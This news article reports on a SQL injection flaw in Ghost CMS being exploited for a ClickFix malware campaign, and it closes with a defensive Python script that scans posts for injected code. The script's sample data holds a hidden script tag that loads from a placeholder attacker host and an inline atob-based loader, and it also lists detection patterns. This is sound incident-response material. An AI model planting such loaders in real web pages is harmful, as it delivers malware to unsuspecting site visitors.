A recently disclosed critical vulnerability in Ghost CMS is being actively exploited by threat actors to compromise websites and deploy malicious code as part of a large-scale ClickFix attack campaign, according to cybersecurity researchers at QiAnXin XLab. The security issue, tracked as CVE-2026-26980, carries a CVSS severity score of 9.4 and affects Ghost's Content API through a SQL injection flaw that can allow unauthenticated attackers to read arbitrary data from the site's database. Researchers reported that attackers have already compromised more than 700 websites across sectors including universities, blockchain, artificial intelligence, software-as-a-service, cybersecurity research, media, and financial technology. The vulnerability was patched in February 2026 in Ghost version 6.19.1; the flaw itself was reportedly discovered by Anthropic using its Claude artificial intelligence platform.
According to findings shared by QiAnXin XLab, attackers are exploiting the vulnerability to obtain a website's Admin API Key from the database. That key turns a read-only data leak into write access: it allows direct modification of content managed through Ghost CMS. Threat actors reportedly used this access to inject malicious JavaScript into articles at scale, placing hidden loaders at the bottom of web pages to support fake-CAPTCHA-based attacks. Researchers described the operation as a large-scale poisoning campaign, with at least two threat clusters believed to be involved in exploiting vulnerable systems. In some cases, websites were reportedly compromised and modified within a single day. XLab stated that the campaign was first identified on May 7, 2026, and warned that abusing legitimate websites significantly increases the credibility of the malicious content, making visitors more likely to trust the deceptive prompts.
The malicious JavaScript injected into compromised sites reportedly functions as a two-stage loader that retrieves additional payloads at runtime from an external domain. Researchers explained that the attackers used cloaking infrastructure designed to deliver harmful payloads only to intended victims while presenting harmless pages to automated security scanners and web crawlers. The external script reportedly collects browser fingerprinting data and decides whether a given visitor receives a redirect, a download, or a malicious prompt. Intended targets are ultimately shown fake CAPTCHA verification pages through embedded iframe elements that instruct victims to manually copy and paste a Base64-encoded command into the Windows Run dialog, initiating a ClickFix infection chain. This process reportedly downloads malicious archives containing scripts that trigger PowerShell commands, fetch remote files, and execute payloads via rundll32.exe, while simultaneously displaying misleading web pages to distract the user.
Researchers noted that later versions of the malware shifted from delivering malicious DLL files to JavaScript payloads, though the final objective remained the installation of a Windows executable capable of persistence and remote communication with attacker-controlled infrastructure. One observed payload reportedly involved a modified version of the open-source Grape desktop client, designed to contact remote servers every 30 seconds and execute attacker-issued commands. Security experts have advised Ghost CMS users to immediately upgrade to the latest software version (6.19.1 or later), rotate credentials including the Admin API Key, inspect published content for unauthorized modifications, review access logs for suspicious activity, and notify users who may have visited affected websites during the period of compromise.
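The two checks a responder would want to run first are a version gate against the patched release and a sweep of published post HTML for the kind of injection described above (script or iframe elements pulling from a foreign host, elements hidden with inline CSS, inline scripts that decode and write further script). The following is an added example written for this article; it is not Ghost's own code and not XLab's tooling or indicator list. It assumes the Content API's usual response shape (a `posts` array whose items carry an `html` field), treats anything not served from the site's own hostname as worth a look, and uses constructed sample posts with placeholder hostnames; the hidden-style and inline-script patterns are generic heuristics, not the campaign's actual loader.

```python
"""Post-compromise triage helpers for a Ghost site (added example, not project code).

1. is_patched(version): is the running Ghost at or above 6.19.1?
2. scan_posts(content_api_json, site_host): flag script/iframe elements in
   post HTML that reference a foreign host, are hidden via inline style, or
   contain inline decode-and-write primitives.

The sample Content API response at the bottom is constructed for this example;
the hostnames in it are placeholders, not real infrastructure.
"""
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PATCHED_VERSION = (6, 19, 1)  # fix shipped in Ghost 6.19.1 per the article


def parse_version(version):
    """'6.19.1', 'v6.18.0' or '6.19.1-rc.1' -> (6, 19, 1). Pre-release suffixes are
    dropped, so a pre-release of the fixed version counts as patched here."""
    core = version.strip().lstrip("v").split("-")[0]
    return tuple(int(p) for p in core.split("."))


def is_patched(version):
    return parse_version(version) >= PATCHED_VERSION


class InjectedTagFinder(HTMLParser):
    """Collects every <script> and <iframe> with its src, inline style and inline body."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            a = dict(attrs)
            self._cur = {"tag": tag, "src": a.get("src") or None,
                         "style": a.get("style") or "", "inline": ""}

    def handle_data(self, data):
        if self._cur is not None and self._cur["tag"] == "script":
            self._cur["inline"] += data

    def handle_endtag(self, tag):
        if tag in ("script", "iframe") and self._cur is not None:
            self.findings.append(self._cur)
            self._cur = None


HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?!\.)", re.I)
DECODE_WRITE = re.compile(r"atob\(|fromCharCode|document\.write\(")


def suspicious_elements(post_html, site_host):
    """Return the script/iframe elements in one post that deserve manual review."""
    parser = InjectedTagFinder()
    parser.feed(post_html)
    parser.close()
    hits = []
    for el in parser.findings:
        reasons = []
        if el["src"]:
            # urlparse handles absolute and protocol-relative ('//host/x.js') URLs;
            # site-relative paths have no hostname and are left alone.
            host = urlparse(el["src"]).hostname
            if host and host.lower() != site_host.lower():
                reasons.append(f"external {el['tag']} src host {host}")
        if HIDDEN_STYLE.search(el["style"]):
            reasons.append("hidden via inline style")
        if el["tag"] == "script" and not el["src"] and DECODE_WRITE.search(el["inline"]):
            reasons.append("inline script with decode/write primitives")
        if reasons:
            hits.append({"tag": el["tag"], "src": el["src"], "reasons": reasons})
    return hits


def scan_posts(content_api_json, site_host):
    """Map post slug -> suspicious elements, for every post that has any."""
    data = json.loads(content_api_json)
    report = {}
    for post in data.get("posts", []):
        hits = suspicious_elements(post.get("html") or "", site_host)
        if hits:
            report[post["slug"]] = hits
    return report


# Constructed sample in the shape of a Content API /posts/ response (placeholder hosts).
SAMPLE_CONTENT_API_RESPONSE = json.dumps({"posts": [
    {"slug": "welcome",
     "html": '<p>Hello</p><script src="https://blog.example.com/assets/main.js"></script>'},
    {"slug": "tampered",
     "html": '<p>Legit text</p><script src="//cdn.attacker-placeholder.example/l.js" style="display:none"></script>'},
    {"slug": "inline",
     "html": "<p>x</p><script>var s=document.createElement('script');s.src=atob('aGlkZGVu');document.head.appendChild(s);</script>"},
]})

if __name__ == "__main__":
    print("patched:", is_patched("6.18.0"), is_patched("6.19.1"))
    print(json.dumps(scan_posts(SAMPLE_CONTENT_API_RESPONSE, "blog.example.com"), indent=2))
```

Run the scan over a full export of the site's posts rather than a sample, and treat every hit as a lead for manual review, not a verdict: legitimate embeds from third-party hosts will show up too, which is why the report keeps the reason alongside each element.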
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.